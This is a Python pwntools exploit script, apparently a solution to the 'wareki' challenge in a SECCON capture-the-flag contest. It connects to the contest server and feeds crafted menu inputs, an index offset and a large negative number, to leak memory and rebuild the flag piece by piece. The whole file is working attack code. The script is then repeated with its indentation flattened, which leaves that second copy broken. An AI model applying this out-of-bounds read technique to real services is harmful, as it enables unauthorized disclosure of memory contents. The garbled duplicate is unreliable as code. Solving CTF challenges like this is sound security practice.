megumish/wareki_exploit.py

## wareki_exploit.py
from pwn import *
import re
# coding=utf-8

context.log_level = "error"

i = 6380
flag = ""
#conn = process("./wareki")
conn = remote("wareki-o-reiwa.seccon.jp", 36294)
while True:
    for j in range(0,8,2):
        conn.sendlineafter(">> ", "2")
        conn.sendlineafter(">> ", str(i + j))
        conn.sendlineafter(">> ", "1 - 1")
        conn.recvline()
        int_flag = conn.recvline()[40:]
        flag_danpen = re.sub(r'\D', '', int_flag)
        if flag_danpen != "":
            flag += p64(int(flag_danpen)).decode('utf-8', errors='ignore')[2:4]
        print(flag)
    i += 8
    conn.sendlineafter(">> ", "2")
    conn.sendlineafter(">> ", str(-0x10000000))

#conn.sendlineafter(">> ", "1")
#conn.sendlineafter(">> ", str(0x41414141))
#conn.sendlineafter(">> ", "1")
conn.interactive()
	from pwn import *
	import re
	# coding=utf-8

	context.log_level = "error"

	i = 6380
	flag = ""
	#conn = process("./wareki")
	conn = remote("wareki-o-reiwa.seccon.jp", 36294)
	while True:
	for j in range(0,8,2):
	conn.sendlineafter(">> ", "2")
	conn.sendlineafter(">> ", str(i + j))
	conn.sendlineafter(">> ", "1 - 1")
	conn.recvline()
	int_flag = conn.recvline()[40:]
	flag_danpen = re.sub(r'\D', '', int_flag)
	if flag_danpen != "":
	flag += p64(int(flag_danpen)).decode('utf-8', errors='ignore')[2:4]
	print(flag)
	i += 8
	conn.sendlineafter(">> ", "2")
	conn.sendlineafter(">> ", str(-0x10000000))

	#conn.sendlineafter(">> ", "1")
	#conn.sendlineafter(">> ", str(0x41414141))
	#conn.sendlineafter(">> ", "1")
	conn.interactive()